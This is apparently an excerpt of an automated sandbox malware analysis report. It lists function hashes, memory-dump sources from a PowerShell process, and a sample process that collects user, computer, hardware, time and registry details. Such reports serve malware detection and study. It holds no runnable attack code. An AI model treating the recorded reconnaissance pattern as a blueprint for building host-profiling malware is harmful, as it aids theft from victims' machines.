Opcode Fuzzy Hash: f8b5bb9a8ab55c5209fa7995b1aa6ec8d17709edacd3bd93905e23f4d2015d18
Instruction Fuzzy Hash: ADF027B16005049BE704AF69C0057ABB7A6DFC0328F11C12AD90957399CE363D05C7E0

Function 04359549 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6646883189a2c86aaa2ca68d5594ba39cf5bf34191a6ae5f5c10a344e48d68d
Instruction ID: 32ca6e0575cda6c0b136a120d3e9cf44f5f1a9a73403811e426d083e848681b7
Opcode Fuzzy Hash: d6646883189a2c86aaa2ca68d5594ba39cf5bf34191a6ae5f5c10a344e48d68d
Instruction Fuzzy Hash: 16E068923062059B9A0437BD9C00A6AE69ECFC917070222B2CE11D32A0ED01EC2903D0

Function 0435DED8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 965e437811bb474797bd49fdacd4a0317b0d94994e7364fe8652976f9cae2694
Instruction ID: b880a085649d4bd6f54cf9ef39659101895b6c803864d8178a8bd688d5927a20
Opcode Fuzzy Hash: 965e437811bb474797bd49fdacd4a0317b0d94994e7364fe8652976f9cae2694
Instruction Fuzzy Hash: F7E0E5353005118F87109B5DE498C26B7FAEFCE66932954AAF94ACB735DA61EC018B90

Function 0435AF98 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 468206b236104882c36a81713bbf83609113e23bb32bafe092fcf8e9ed7af76e
Instruction ID: 81cee17cc85a2482b650ad36d3d24298dd123031aad3a1672335bf6f2a756b0b
Opcode Fuzzy Hash: 468206b236104882c36a81713bbf83609113e23bb32bafe092fcf8e9ed7af76e
Instruction Fuzzy Hash: 1EE0D82130C3965BCB16536E6C50855BF77CFC763431885BBED80CB256EE1198158360

Function 04359170 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9bd0005147c1e080be8bfbed784fee385f5f22886c3e7d1a41b18a771490dc8
Instruction ID: be1d719f8d6d8755b7223d6fd47e931734b0b30e237c2112b608e2ac8d74d6de
Opcode Fuzzy Hash: e9bd0005147c1e080be8bfbed784fee385f5f22886c3e7d1a41b18a771490dc8
Instruction Fuzzy Hash: 47F06D709013048BD760AFB8D89D79A7BE9FB44320F008429E55EC3350DB397980CB90

Function 04358978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae2838b0b13d37aee9d1c62118ee90ee473acb1b6b269647ad16fee5aa20834d
Instruction ID: d75c8119e0b91ae3434dc1c06ade0f44e457d697cc51bdc481473b7c3c40099c
Opcode Fuzzy Hash: ae2838b0b13d37aee9d1c62118ee90ee473acb1b6b269647ad16fee5aa20834d
Instruction Fuzzy Hash: 82E0263570461187CF0D3B78A80C2AE7A66FBC4738F04802AEA0A83384CF7D6D0183E9

Function 04359558 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd0da497e90a87e739bea1c9db39459cef4564d22f145f6bf0585d565a5bd975
Instruction ID: 74771a476133612b71c9cb2fbfe35c38976431bce2b6c9880e779937baea43fd
Opcode Fuzzy Hash: cd0da497e90a87e739bea1c9db39459cef4564d22f145f6bf0585d565a5bd975
Instruction Fuzzy Hash: 58D05E927021295B5A5831AE5800FBBD5DFCEC54A4B4625769F15D3361EC41EC2903E1

Function 0435DCA0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c99f5ebfee05fc00a1ec567deeee4a1293badffeba37f84be986cb300a5f47a
Instruction ID: f1ae0555ef80410c5ee2375a110212257ffad33ab65a3be49be502690e6a6ec6
Opcode Fuzzy Hash: 3c99f5ebfee05fc00a1ec567deeee4a1293badffeba37f84be986cb300a5f47a
Instruction Fuzzy Hash: 25E0C232700614578725AA2EA811C5F7BEBDFC5671350842EE419C7700DE68ED0247D5

Function 0435DCF0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 98b2fa127e92f596bec4869ba29af701264a09c8ecaf6fdfddd1560cb68ad3c5
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 42E08631B00014978B089599D4508E9F7A9DBCD220F04D47EDD0AA7750EA32691686E1

Function 04358739 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bf101617a177f5079a0af5a51f9bcaa81f8553caabe9c22af7ec1a3cd06e5f2
Instruction ID: 838fb4dc5288045ace0a0e887105ea033357d3e6adcf3803c47c39f2d1e7fd7e
Opcode Fuzzy Hash: 6bf101617a177f5079a0af5a51f9bcaa81f8553caabe9c22af7ec1a3cd06e5f2
Instruction Fuzzy Hash: 6EE0483080510AC7CB09BFA5E40B4EDBF34FF15311B4041A9ED8292290FF302A56CB80

Function 04358800 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0b8186a144346700613f3c0364fd19c372120fd3859f5918e2b0ac36d6888d
Instruction ID: 6603f28a82d700f5e49e389269105ffdde4aae8cdac9005e037f0c7697060401
Opcode Fuzzy Hash: 9f0b8186a144346700613f3c0364fd19c372120fd3859f5918e2b0ac36d6888d
Instruction Fuzzy Hash: A2E01A35A1920A8BC714AFA8E4475AABFB4BF44324B108069ED8597740EB3069A0CBC1

Function 0435F860 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9020d8b5229aaf71267feb288066d851f90f289027b7964e86ee933d5dfa6225
Instruction ID: 252e08502d76c0895be907f313171eb0df4f2fb593e7400810aa0a8767daca21
Opcode Fuzzy Hash: 9020d8b5229aaf71267feb288066d851f90f289027b7964e86ee933d5dfa6225
Instruction Fuzzy Hash: 7AE0ED70E052459FC751EFB8C481599FFF0AF49310B2485EEC989DB215E3315511DB92

Function 0435F870 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 696f278451361114116571cfe5c5a5eecfa8f249f23f28eee502e13609c1f426
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: C8D067B0E042099F8780EFADC94156EFBF4EB48204F6085AA8919E7311F7329A12DBD1

Function 04358748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8bc4d44b5da4e5ee9e2e8f36abecdd33342f5ae6d302f0e3eeed8886fd061d0
Instruction ID: f2c933b11caa28e5e29b1b1b9de5cf133ed4b4392b41d047234fb81ca9c69fd0
Opcode Fuzzy Hash: e8bc4d44b5da4e5ee9e2e8f36abecdd33342f5ae6d302f0e3eeed8886fd061d0
Instruction Fuzzy Hash: 72D067319051098BCB08ABA5E85B8BDBF78FB14311F404169E90792690FA353A5ACAC5

Function 04358810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e8c70fdd81295f704fdaf192bdc8daace128cf691f5d693dc278996be87198
Instruction ID: c9e6a2ca76319d77ff3f8325f5e8182d3993d177d22c29b7798e031324141ec4
Opcode Fuzzy Hash: 46e8c70fdd81295f704fdaf192bdc8daace128cf691f5d693dc278996be87198
Instruction Fuzzy Hash: 77D01735A0820A8BCB08EFA4E84686EBFB8AB44301F008169ED4993350EA306C11CBC1

Function 04357932 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16aedb076015220b7b8ea44748643175f84948d9745ddc3f9b6d27103c234a69
Instruction ID: dbc3f492d62faf1f5efac98673379c0580704322e70aa6b4ddc26f665dbc90d5
Opcode Fuzzy Hash: 16aedb076015220b7b8ea44748643175f84948d9745ddc3f9b6d27103c234a69
Instruction Fuzzy Hash: 81D0923418E7C49FC7168F7894988943FA49E0312470904DEE8868F1B7C9768489CB46

Function 04357EA0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95bde0c9549e6d702fad07a3806e3735fe2b6df36a52420a573a310d44f15c1a
Instruction ID: c64f27f1b85ee3cb8a794efad52f6c3db4ec672fdd3e2cf01824139bde0f9da1
Opcode Fuzzy Hash: 95bde0c9549e6d702fad07a3806e3735fe2b6df36a52420a573a310d44f15c1a
Instruction Fuzzy Hash: 0FC0482A19FBD89EE703433649A0582AF70195242438F02EFD180CEA63C219880ECBA2

Function 04357940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 681c65cd32d1a6e6393cc757d79f7bb807a202e3b9f9258fbcffdc0393995726
Instruction ID: 697b73e833abea9f6c4a004149d7a6fabcef445accbb40e32e960efa0856a472
Opcode Fuzzy Hash: 681c65cd32d1a6e6393cc757d79f7bb807a202e3b9f9258fbcffdc0393995726
Instruction Fuzzy Hash: A6B092301467088FC2486F75A408914732DEF4461578004A8E80E0A2A68E77E884CA44

Non-executed Functions

Function 043552F0 Relevance: .4, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e87e88bf84404f1feca18a671d750c420324c9d5f18f7ff13de28a8a913670
Instruction ID: 2bad0374347bc8177e709a8fc885a313f2fd4806df5a3a29ded581a1058f073b
Opcode Fuzzy Hash: 24e87e88bf84404f1feca18a671d750c420324c9d5f18f7ff13de28a8a913670
Instruction Fuzzy Hash: 01E14EB0B012449FC715CF38D494BAE7BF6AF89304F105869D84ACB759EB35E9029B52

Function 071C3928 Relevance: 10.3, Strings: 8, Instructions: 323COMMON

Download Yara Rule

Strings

$fq, xrefs: 071C3C0E
4'fq, xrefs: 071C3B35
4'fq, xrefs: 071C3B29
tPfq, xrefs: 071C39A5
$fq, xrefs: 071C3960
tPfq, xrefs: 071C39B1
$fq, xrefs: 071C396C
$fq, xrefs: 071C393A

Memory Dump Source

Source File: 00000006.00000002.1815556226.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq
API String ID: 0-3165298016
Opcode ID: 2aa0dcb8acd9aada6f66f0806b1fa8a7eb48a6a53d03d191797b25bb995062a5
Instruction ID: f77349da8b8ea0aa2b1502e8e2daeae09abbb6ac667ba3b44b624e75e0367f33
Opcode Fuzzy Hash: 2aa0dcb8acd9aada6f66f0806b1fa8a7eb48a6a53d03d191797b25bb995062a5
Instruction Fuzzy Hash: 63A169B17142459FC726DBB8880176ABBA6AFE6710F18C0AFD565CB2D1CB31C851C7A2

Function 071C1BE0 Relevance: 7.9, Strings: 6, Instructions: 401COMMON

Download Yara Rule

Strings

tPfq, xrefs: 071C1FDF
4'fq, xrefs: 071C1F89
tPfq, xrefs: 071C1FEB
4'fq, xrefs: 071C1C86
4'fq, xrefs: 071C1F95
4'fq, xrefs: 071C1C92

Memory Dump Source

Source File: 00000006.00000002.1815556226.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$tPfq$tPfq
API String ID: 0-3815971827
Opcode ID: 9748b96006e98fd93b22048b1e3c45051858bd784122e837b602b16b72df4691
Instruction ID: 83da55c2a717ccdb15dba94cb98a9b314f79e5cdc6871ba3b0657435d33c788d
Opcode Fuzzy Hash: 9748b96006e98fd93b22048b1e3c45051858bd784122e837b602b16b72df4691
Instruction Fuzzy Hash: 81D139F1B0420A9FCB26CBE884406ABBBB6AFD2310F14806FD515DB2D6DB31C855D7A1

Function 071C3678 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

$fq, xrefs: 071C3836
4'fq, xrefs: 071C372E
4'fq, xrefs: 071C3722
$fq, xrefs: 071C37FF
$fq, xrefs: 071C382A

Memory Dump Source

Source File: 00000006.00000002.1815556226.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$$fq$$fq$$fq
API String ID: 0-3759051638
Opcode ID: 394ba88c8d6d2106a07fb53c54e1c06713ee85af7389fb5fc0b9919c71326077
Instruction ID: 1c7692080e65ae4b51642406a630acf13663e7dc0c0e1342747fda2a54c89b2f
Opcode Fuzzy Hash: 394ba88c8d6d2106a07fb53c54e1c06713ee85af7389fb5fc0b9919c71326077
Instruction Fuzzy Hash: B15128F17043469BCB26DAF98402766BBB6AFE2210F24C06ED465CB6C1DB31C851C793

Function 04354C62 Relevance: 6.3, Strings: 5, Instructions: 78COMMON

Download Yara Rule

Strings

~n^, xrefs: 04354CD2
~n^, xrefs: 04354D32
~n^, xrefs: 04354C62
~n^, xrefs: 04354CE2
~n^, xrefs: 04354C92

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID: ~n^$~n^$~n^$~n^$~n^
API String ID: 0-4019985572
Opcode ID: ec0386c59e81f27996152f9245b67eff8a11dc1ea029b026cd6a59be6e1f0315
Instruction ID: 4f2089030f6e169b5c3394adbcafcf2d02d7c03988a17d8fe0fa03b2b869cf24
Opcode Fuzzy Hash: ec0386c59e81f27996152f9245b67eff8a11dc1ea029b026cd6a59be6e1f0315
Instruction Fuzzy Hash: 5731299780E3C10FC30A8B7988A82813F74EF631D4F4A45DB80D58F0E3D819642B8757

Function 04357A21 Relevance: 5.2, Strings: 4, Instructions: 239COMMON

Download Yara Rule

Strings

`gq, xrefs: 04357BA2
`gq, xrefs: 04357C44
`gq, xrefs: 04357B23
`gq, xrefs: 04357CC2

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID: `gq$`gq$`gq$`gq
API String ID: 0-3352594996
Opcode ID: 37c893623c17849ae17f6185ebad3412fa1c59218c828dc849571b3d38455ce8
Instruction ID: d10b41b499454ad98d02769bd02a1b6819039c57cb19f698f38b995d27ca2ce9
Opcode Fuzzy Hash: 37c893623c17849ae17f6185ebad3412fa1c59218c828dc849571b3d38455ce8
Instruction Fuzzy Hash: A4B1B974E012099FDB55DFA9D580A9EFBF2FF88300F109629E819AB355DB30A945CF90

Function 04357A30 Relevance: 5.2, Strings: 4, Instructions: 234COMMON

Download Yara Rule

Strings

`gq, xrefs: 04357BA2
`gq, xrefs: 04357C44
`gq, xrefs: 04357B23
`gq, xrefs: 04357CC2

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID: `gq$`gq$`gq$`gq
API String ID: 0-3352594996
Opcode ID: 259749664af9995148d0abe21fb3fd583133fd07fafc7de76d4197031c67ce85
Instruction ID: 2871fd69fde3b281e2f31343c13578c11be0dcf5a70b07c1049d535cf77445d3
Opcode Fuzzy Hash: 259749664af9995148d0abe21fb3fd583133fd07fafc7de76d4197031c67ce85
Instruction Fuzzy Hash: E2B1A874E002099FDB54DFA9D581A9EFBF2FF88304F109629E819AB355DB30A945CF90

Function 071C5777 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

$fq, xrefs: 071C57C6
$fq, xrefs: 071C5800
$fq, xrefs: 071C57AA
$fq, xrefs: 071C57F4

Memory Dump Source

Source File: 00000006.00000002.1815556226.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: 66ecc5b97c8f43f8c2657e5ade828bc45874ae2b028f089609a06301f5021bf6
Instruction ID: fcb7176c5c0749a825d2a8c8f1d75dfec15a72707e41d286a8bac8f55c0f62fb
Opcode Fuzzy Hash: 66ecc5b97c8f43f8c2657e5ade828bc45874ae2b028f089609a06301f5021bf6
Instruction Fuzzy Hash: EB31A9F23043819FDB2686B688427623FA75FE2314F78406FE545CB2C3DA36A916C321

Function 04354D62 Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

~n^, xrefs: 04354D62
~n^, xrefs: 04354DD2
~n^, xrefs: 04354D82
~n^, xrefs: 04354DE2

Memory Dump Source

Source File: 00000006.00000002.1768177557.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4350000_powershell.jbxd

Similarity

API ID:
String ID: ~n^$~n^$~n^$~n^
API String ID: 0-942639280
Opcode ID: 6f78490add02d143bf961371ff74d5531e4c180a4a014d9210e65942c7e62b25
Instruction ID: e0701e6f214f2fc1c40a964cf4e3f099b92e96554132291d20db82719e7770e5
Opcode Fuzzy Hash: 6f78490add02d143bf961371ff74d5531e4c180a4a014d9210e65942c7e62b25
Instruction Fuzzy Hash: 4D418F6260A3D04FC3069B3CD8A4AD13FF5AF97254B0A44DBD4C4CF2A3D924AC5AC796

Function 071C5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$fq, xrefs: 071C57C6
$fq, xrefs: 071C5800
$fq, xrefs: 071C57AA
$fq, xrefs: 071C57F4

Memory Dump Source

Source File: 00000006.00000002.1815556226.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: cf2eec574ace82733518472a35d817e9ccd3aac212ccb87e04914c9a789321c6
Instruction ID: b7018ae137e250094315bf7097a0549ea45561c77a86d2886570661e777a0804
Opcode Fuzzy Hash: cf2eec574ace82733518472a35d817e9ccd3aac212ccb87e04914c9a789321c6
Instruction Fuzzy Hash: 9E2146B27103029BDB38D5AB8902727779B9BE0315F70803EA505CB6C1DF75E8618361

Function 071C0309 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

4'fq, xrefs: 071C0373
$fq, xrefs: 071C035E
4'fq, xrefs: 071C037F
$fq, xrefs: 071C0352

Memory Dump Source

Source File: 00000006.00000002.1815556226.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$$fq$$fq
API String ID: 0-2206495126
Opcode ID: 71e68330f3c264072b0f2525a407c8aba830e5180e6c6a868de097ce525bf249
Instruction ID: 455505212f12a71de696d326b4eefcaa14f16194f888a3876b757fcf1d8d7bfc
Opcode Fuzzy Hash: 71e68330f3c264072b0f2525a407c8aba830e5180e6c6a868de097ce525bf249
Instruction Fuzzy Hash: CC018FA160E3D29FCB2B56784C212166FB66FD765071A50DFD090DF2D3CE254C4683A7

Analysis Process: t0ppkxxj.rwu.exePID: 6796, Parent PID: 4208COMMON

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.3%
Total number of Nodes:	1366
Total number of Limit Nodes:	101

Executed Functions

Function 00007FF621898330 Relevance: 50.4, APIs: 19, Strings: 9, Instructions: 1376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF621896540: EnumDisplayDevicesW.USER32 ref: 00007FF621896657
Part of subcall function 00007FF621896540: EnumDisplayDevicesW.USER32 ref: 00007FF6218966FB

Part of subcall function 00007FF621896460: RegGetValueA.KERNEL32 ref: 00007FF6218964C9

Part of subcall function 00007FF621896150: GetUserNameW.ADVAPI32 ref: 00007FF621896195

Part of subcall function 00007FF6218961F0: GetComputerNameW.KERNEL32 ref: 00007FF621896235

Part of subcall function 00007FF621851900: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218519D4

Part of subcall function 00007FF621853FF0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185447D

GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6218987BC
wcsftime.LIBCMT ref: 00007FF621898FB2
GetModuleFileNameA.KERNEL32 ref: 00007FF621899146
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B09
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B0F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B15
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B1B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B33
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B39
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B3F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B45
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B4B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B51
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B5D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621899B63

Strings

user_name, xrefs: 00007FF62189846F
cpu, xrefs: 00007FF621898658
%d-%m-%Y, %H:%M:%S, xrefs: 00007FF621898F9F
timezone, xrefs: 00007FF621899454
computer_name, xrefs: 00007FF621898994
ram, xrefs: 00007FF62189889B
system, xrefs: 00007FF621898424, 00007FF621898513, 00007FF621898609, 00007FF621898703, 00007FF62189884B, 00007FF621898945, 00007FF621898A38, 00007FF621898BBF, 00007FF621898DB0, 00007FF621899031, 00007FF6218991F4, 00007FF62189940E, 00007FF6218995AD, 00007FF621899757, 00007FF62189981D
time, xrefs: 00007FF621899081
gpu, xrefs: 00007FF621898562

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Name$DevicesDisplayEnum$ComputerFileGlobalMemoryModuleStatusUserValuewcsftime
String ID: %d-%m-%Y, %H:%M:%S$computer_name$cpu$gpu$ram$system$time$timezone$user_name
API String ID: 4122120932-1182675529
Opcode ID: 9d8181cc4787a6450b4393eea902c5c2dc0517c4e7202f837b1bb58cb5449355
Instruction ID: 3c29a09a8ac97407e5e83e3c80d27fc36e752a33bcc53965b1dffd64cd7324b4
Opcode Fuzzy Hash: 9d8181cc4787a6450b4393eea902c5c2dc0517c4e7202f837b1bb58cb5449355
Instruction Fuzzy Hash: 64E26133A18BC595DB21CF25D8902ED77A1F789798F409225EA9D87BA9DF3CD240C701

Function 00007FF621844B70 Relevance: 46.8, APIs: 21, Strings: 5, Instructions: 1343registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF62184509B
RegQueryValueExA.ADVAPI32 ref: 00007FF6218450E9
RegCloseKey.ADVAPI32 ref: 00007FF621845186
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621846384
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218463A5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218463AB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218463B1
